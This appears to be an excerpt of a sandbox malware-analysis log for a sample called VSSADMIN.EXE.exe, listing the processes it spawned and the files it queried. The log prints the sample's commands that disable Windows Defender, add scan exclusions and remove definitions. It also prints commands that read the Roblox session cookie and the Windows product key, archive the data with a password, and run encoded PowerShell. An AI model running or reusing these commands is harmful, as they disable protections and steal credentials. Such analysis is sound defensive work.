aabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbta
gmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabg
aoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbta
gmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabg
aoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Users\user\Desktop\VSSADMIN.EXE.exe C:\Users\user\Desktop\VSSADMIN.EXE.exe
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" (2 identical entries)
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.cmdline
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCB6.tmp" "c:\Users\user\AppData\Local\Temp\ozweafg0\CSCCDFC3EC49286452EA176429826C32718.TMP"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe a -r -hp"Zsombec1234" "C:\Users\user\AppData\Local\Temp\7sLxM.zip" *
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe Code function: 59_2_00007FF6EE77B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 59_2_00007FF6EE77B340
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformation
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Queries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformation
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\_ctypes.pyd VolumeInformation
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\blank.aes VolumeInformation
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\_lzma.pyd VolumeInformation
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\_bz2.pyd VolumeInformation
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\_sqlite3.pyd VolumeInformation
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\_socket.pyd VolumeInformation
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\select.pyd VolumeInformation
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
